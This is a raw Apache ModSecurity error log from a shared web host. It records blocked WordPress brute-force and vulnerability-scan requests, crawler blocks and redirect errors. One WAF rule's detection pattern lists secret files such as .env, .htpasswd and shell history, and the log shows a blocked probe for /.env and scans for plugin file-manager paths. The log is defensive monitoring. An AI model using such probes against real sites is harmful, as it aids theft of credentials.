[Tue May 26 13:27:29.375364 2026] [security2:error] [pid 512344:tid 512553] [client 31.57.184.107:55256] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "applygoodjobs.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVSacbElyei4S77DQf8cAAAAE8"], referer: https://www.facebook.com/
[Tue May 26 13:27:29.784433 2026] [security2:error] [pid 512745:tid 512978] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahVSaXKSB_s2CvZg7xNjEwAAAXE"]
[Tue May 26 13:27:29.865989 2026] [security2:error] [pid 512745:tid 512978] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVSaXKSB_s2CvZg7xNjEwAAAXE"]
[Tue May 26 13:27:30.478546 2026] [security2:error] [pid 512745:tid 512976] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSanKSB_s2CvZg7xNjGwAAAW8"]
[Tue May 26 13:27:30.767945 2026] [security2:error] [pid 512745:tid 512877] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahVSanKSB_s2CvZg7xNjIwAAAQw"]
[Tue May 26 13:27:30.842219 2026] [security2:error] [pid 512745:tid 512877] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVSanKSB_s2CvZg7xNjIwAAAQw"]
[Tue May 26 13:27:32.185998 2026] [security2:error] [pid 512745:tid 512941] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSa3KSB_s2CvZg7xNjMQAAAUw"]
[Tue May 26 13:27:32.623176 2026] [security2:error] [pid 512745:tid 512757] [remote 172.194.139.254:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.139.194.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVSbHKSB_s2CvZg7xNjNwABGws"]
[Tue May 26 13:27:32.810419 2026] [core:error] [pid 512745:tid 512885] [client 167.71.14.179:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:27:32.810440 2026] [core:error] [pid 512745:tid 512885] [client 167.71.14.179:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:27:35.183643 2026] [security2:error] [pid 512745:tid 512974] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSbnKSB_s2CvZg7xNjXgAAAW0"]
[Tue May 26 13:27:36.472859 2026] [core:error] [pid 512745:tid 512995] [client 167.71.14.179:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://cpanel.rehobothindependentcare.com/
[Tue May 26 13:27:36.472889 2026] [core:error] [pid 512745:tid 512995] [client 167.71.14.179:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://cpanel.rehobothindependentcare.com/
[Tue May 26 13:27:37.342169 2026] [security2:error] [pid 512344:tid 512596] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVScMbElyei4S77DQf8uQAAAHo"]
[Tue May 26 13:27:39.588666 2026] [security2:error] [pid 512745:tid 512920] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSc3KSB_s2CvZg7xNjogAAATc"]
[Tue May 26 13:27:42.863498 2026] [security2:error] [pid 512745:tid 512966] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSdnKSB_s2CvZg7xNjxwAAAWU"]
[Tue May 26 13:27:43.501074 2026] [security2:error] [pid 512745:tid 512907] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSd3KSB_s2CvZg7xNjzwAAASo"]
[Tue May 26 13:27:44.347000 2026] [security2:error] [pid 512745:tid 512898] [client 14.244.71.245:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSd3KSB_s2CvZg7xNj4QAAASE"]
[Tue May 26 13:27:45.531797 2026] [security2:error] [pid 512745:tid 512895] [client 31.57.184.107:54368] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ucdc.co.in"] [uri "/wp-login.php"] [unique_id "ahVSeXKSB_s2CvZg7xNj_gAAAR4"], referer: https://wordpress.org/
[Tue May 26 13:27:46.412530 2026] [security2:error] [pid 512344:tid 512534] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSecbElyei4S77DQf9DAAAADw"]
[Tue May 26 13:27:47.528247 2026] [security2:error] [pid 512745:tid 512959] [client 31.57.184.107:54835] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVSe3KSB_s2CvZg7xNkBQAAAV4"], referer: https://www.facebook.com/
[Tue May 26 13:27:48.132649 2026] [security2:error] [pid 512344:tid 512537] [client 114.119.158.0:48109] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/pages/services-wide/"] [unique_id "ahVSfMbElyei4S77DQf9LgAAAD8"], referer: https://premiumproxy.net/check-reverse-domain-ip-lookup/google.co.cr
[Tue May 26 13:27:48.475929 2026] [security2:error] [pid 512745:tid 512967] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSfHKSB_s2CvZg7xNkCgAAAWY"]
[Tue May 26 13:27:50.551522 2026] [security2:error] [pid 512344:tid 512477] [client 209.163.119.193:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVSfsbElyei4S77DQf9UwAAAAM"], referer: https://www.anujtradingco.com/
[Tue May 26 13:27:51.178934 2026] [security2:error] [pid 512344:tid 512499] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSfsbElyei4S77DQf9VQAAABk"]
[Tue May 26 13:27:51.737288 2026] [security2:error] [pid 512344:tid 512378] [remote 62.181.233.16:56622] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 16.233.181.62.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVSf8bElyei4S77DQf9YgAAZCE"]
[Tue May 26 13:27:52.150605 2026] [security2:error] [pid 512745:tid 512950] [client 209.163.119.193:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVSgHKSB_s2CvZg7xNkMgAAAVU"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1231905&moderation-hash=f6352d077ae01247cabe79835f6c3df9
[Tue May 26 13:27:52.479599 2026] [security2:error] [pid 512745:tid 512990] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSf3KSB_s2CvZg7xNkLQAAAX0"]
[Tue May 26 13:27:55.437990 2026] [security2:error] [pid 512344:tid 512498] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSg8bElyei4S77DQf9ggAAABg"]
[Tue May 26 13:27:55.441014 2026] [security2:error] [pid 512745:tid 512940] [client 209.163.119.193:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVSg3KSB_s2CvZg7xNkXAAAAUs"], referer: https://anujtradingco.com
[Tue May 26 13:27:55.794070 2026] [security2:error] [pid 512745:tid 512856] [remote 65.2.90.30:36078] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.90.2.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahVSg3KSB_s2CvZg7xNkYAABWW4"]
[Tue May 26 13:27:57.234717 2026] [security2:error] [pid 512745:tid 512899] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVShHKSB_s2CvZg7xNkiQAAASI"]
[Tue May 26 13:27:57.262572 2026] [security2:error] [pid 512344:tid 512529] [client 4.204.220.190:62938] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.applygoodjobs.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVShcbElyei4S77DQf9nAAAADc"]
[Tue May 26 13:27:57.262690 2026] [security2:error] [pid 512344:tid 512529] [client 4.204.220.190:62938] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.applygoodjobs.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVShcbElyei4S77DQf9nAAAADc"]
[Tue May 26 13:27:57.361004 2026] [security2:error] [pid 512344:tid 512394] [remote 129.211.218.71:41254] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.218.211.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahVShcbElyei4S77DQf9mwAAJjE"]
[Tue May 26 13:27:57.406288 2026] [security2:error] [pid 512745:tid 512943] [client 4.204.220.190:61052] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.applygoodjobs.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahVShXKSB_s2CvZg7xNkkQAAAU4"]
[Tue May 26 13:27:57.406367 2026] [security2:error] [pid 512745:tid 512943] [client 4.204.220.190:61052] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.applygoodjobs.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahVShXKSB_s2CvZg7xNkkQAAAU4"]
[Tue May 26 13:27:59.362150 2026] [security2:error] [pid 512745:tid 512926] [client 176.65.139.237:28086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.quincaillerie.azurmediatec.com"] [uri "/.env"] [unique_id "ahVSh3KSB_s2CvZg7xNk5QAAAT0"]
[Tue May 26 13:27:59.615126 2026] [autoindex:error] [pid 512745:tid 512972] [client 20.17.99.187:56871] AH01276: Cannot serve directory /home1/taote1zo/public_html/rainadelproperties.com/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 13:27:59.776018 2026] [security2:error] [pid 512745:tid 512912] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSh3KSB_s2CvZg7xNk5AAAAS8"]
[Tue May 26 13:28:02.179925 2026] [security2:error] [pid 512745:tid 512965] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSiXKSB_s2CvZg7xNlAQAAAWQ"]
[Tue May 26 13:28:03.606192 2026] [security2:error] [pid 512745:tid 512959] [client 169.159.128.176:37866] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVSi3KSB_s2CvZg7xNlEAAAAV4"]
[Tue May 26 13:28:03.879756 2026] [security2:error] [pid 512344:tid 512405] [remote 46.101.75.237:47898] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.75.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahVSi8bElyei4S77DQf92QAAdTw"]
[Tue May 26 13:28:04.453198 2026] [security2:error] [pid 512745:tid 512904] [client 62.60.130.233:55581] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "r.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVSjHKSB_s2CvZg7xNlJAAAASc"]
[Tue May 26 13:28:04.488560 2026] [security2:error] [pid 512745:tid 512895] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSjHKSB_s2CvZg7xNlIQAAAR4"]
[Tue May 26 13:28:04.625509 2026] [security2:error] [pid 512344:tid 512412] [remote 216.73.217.110:39014] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 110.217.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/online.php"] [unique_id "ahVSjMbElyei4S77DQf95QAAEEM"]
[Tue May 26 13:28:04.780576 2026] [security2:error] [pid 512745:tid 512885] [client 62.60.130.233:55725] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "r.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVSjHKSB_s2CvZg7xNlNwAAARQ"], referer: https://www.facebook.com/
[Tue May 26 13:28:05.389346 2026] [security2:error] [pid 512745:tid 512959] [client 169.159.128.176:37866] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVSi3KSB_s2CvZg7xNlEAAAAV4"]
[Tue May 26 13:28:05.389418 2026] [security2:error] [pid 512745:tid 512959] [client 169.159.128.176:37866] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVSi3KSB_s2CvZg7xNlEAAAAV4"]
[Tue May 26 13:28:05.524793 2026] [core:error] [pid 512344:tid 512495] [client 205.210.31.85:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:28:05.524816 2026] [core:error] [pid 512344:tid 512495] [client 205.210.31.85:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:28:05.881375 2026] [security2:error] [pid 512745:tid 512836] [remote 34.88.138.128:11776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.138.88.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahVSjXKSB_s2CvZg7xNlRwABJlo"]
[Tue May 26 13:28:06.347808 2026] [security2:error] [pid 512745:tid 512989] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSjXKSB_s2CvZg7xNlTQAAAXw"]
[Tue May 26 13:28:06.824160 2026] [security2:error] [pid 512745:tid 512937] [client 169.159.128.176:37942] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVSjnKSB_s2CvZg7xNlWQAAAUg"]
[Tue May 26 13:28:06.910324 2026] [security2:error] [pid 512745:tid 512937] [client 169.159.128.176:37942] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVSjnKSB_s2CvZg7xNlWQAAAUg"]
[Tue May 26 13:28:08.527499 2026] [security2:error] [pid 512344:tid 512521] [client 169.159.128.176:37992] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVSkMbElyei4S77DQf-CAAAAC8"]
[Tue May 26 13:28:08.599418 2026] [security2:error] [pid 512745:tid 512922] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSkHKSB_s2CvZg7xNlbwAAATk"]
[Tue May 26 13:28:08.611378 2026] [security2:error] [pid 512344:tid 512521] [client 169.159.128.176:37992] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVSkMbElyei4S77DQf-CAAAAC8"]
[Tue May 26 13:28:10.209149 2026] [security2:error] [pid 512344:tid 512525] [client 169.159.128.176:38026] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVSksbElyei4S77DQf-JAAAADM"]
[Tue May 26 13:28:10.279746 2026] [security2:error] [pid 512344:tid 512525] [client 169.159.128.176:38026] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVSksbElyei4S77DQf-JAAAADM"]
[Tue May 26 13:28:10.899314 2026] [security2:error] [pid 512344:tid 512581] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSksbElyei4S77DQf-KQAAAGs"]
[Tue May 26 13:28:11.877969 2026] [security2:error] [pid 512344:tid 512590] [client 169.159.128.176:38060] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVSk8bElyei4S77DQf-NwAAAHQ"]
[Tue May 26 13:28:11.957036 2026] [security2:error] [pid 512344:tid 512590] [client 169.159.128.176:38060] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVSk8bElyei4S77DQf-NwAAAHQ"]
[Tue May 26 13:28:12.986517 2026] [security2:error] [pid 512344:tid 512480] [client 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVSk8bElyei4S77DQf-NAAABlg"]
[Tue May 26 13:28:13.170660 2026] [security2:error] [pid 512745:tid 512944] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSlHKSB_s2CvZg7xNliQAAAU8"]
